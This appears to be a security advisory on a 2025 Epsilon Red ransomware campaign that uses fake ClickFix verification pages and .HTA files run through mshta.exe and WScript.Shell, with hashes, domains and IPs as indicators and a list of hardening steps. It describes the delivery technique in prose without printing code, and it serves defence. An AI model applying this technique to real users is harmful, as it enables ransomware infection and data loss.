Analysis Summary

A new global wave of ransomware attacks in July 2025 has emerged, utilizing weaponized HTML Application (.HTA) files to deliver a refined version of the Epsilon Red ransomware. Masquerading as “ClickFix” verification portals, attackers have spoofed popular platforms like Discord, Twitch, Kick, and OnlyFans to deceive users into launching malicious payloads under the guise of identity verification. The attack leverages trust in these well-known services to coax victims into interacting with deceptive browser-based elements that sidestep traditional download warnings and antivirus safeguards.

According to the Researcher, once a user clicks the verification button, they are redirected to a secondary page exploiting ActiveX controls, a legacy Windows feature still active in many environments, especially via Internet Explorer components. The embedded scripts create a backdoor using Windows Script Host (WSH) to silently invoke cmd.exe through mshta.exe. This allows the attacker to retrieve and execute ransomware binaries directly from external infrastructure without writing them to disk initially, effectively bypassing SmartScreen, download quarantine, and many endpoint security tools. Researchers confirmed that the campaign departs from earlier clipboard-based tactics, showing higher infection success due to its more silent and sophisticated nature.

Captured live code from infected pages reveals a minimal but powerful JavaScript snippet that uses WScript.Shell to silently fetch and execute a file from IP address 155.94.155.227:2269, with a hidden command shell that ensures no visible trace for users. A second command adds misdirection by displaying a fake “Verification Code” prompt to buy time for the ransomware to finish encrypting files. After infection, the malware gains persistence through Windows task scheduling, launches network reconnaissance, and begins data encryption, leaving ransom notes that stylistically echo REvil’s past attacks but include subtle linguistic differences.

Mitigation of this threat requires immediate hardening of web environments, including disabling ActiveX and WSH, enforcing modern browser policies that block legacy controls, and blacklisting known malicious infrastructure such as twtich[.]cc, capchabot[.]cc, and the associated IPs. Organizations with web-dependent workflows or unmanaged plugin usage are especially vulnerable. Long-term defense strategies must also prioritize employee training via phishing simulations, strict browser management, and adopting zero-trust principles to reduce the blast radius of such socially-engineered, browser-based attack chains.

Impact

• File Encryption
• Gain Access
• Security Bypass

Indicators of Compromise

SHA1

• 9d0079fe0fa3480f3f36105ca8c3933ab1004c05

• adf4fe80ccef030466c9d12b4340ea0a3fd02d9a

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Disable ActiveX controls to prevent legacy script execution via Internet Explorer components.
• Disable Windows Script Host (WSH) by restricting wscript.exe and cscript.exe through Group Policy or endpoint protection.
• Block execution of mshta.exe to prevent .HTA files from launching.
• Blacklist the malicious domains twtich[.]cc and capchabot[.]cc in DNS and firewall settings.
• Block IP addresses 155.94.155.227:2269 and 213.209.150.188:8112 at the network perimeter.
• Restrict or fully disable Internet Explorer and enforce the use of secure, modern browsers like Chrome, Edge, or Firefox.
• Implement application control (e.g., AppLocker or WDAC) to block unauthorized scripts and binaries.
• Set up alerts and monitoring for usage of scripting engines such as cmd.exe, PowerShell, and mshta.exe.
• Deploy browser isolation or sandboxing technologies to limit exposure to untrusted content.
• Enhance email and web gateway filtering to block.HTA files and suspicious JavaScript-based payloads.
• Conduct regular phishing simulations to train users to recognize fake verification screens and social engineering lures.
• Apply the principle of least privilege, ensuring users have minimal permissions and no unnecessary admin rights.
• Use endpoint detection and response (EDR/XDR) solutions that can detect in-memory execution and command-line anomalies.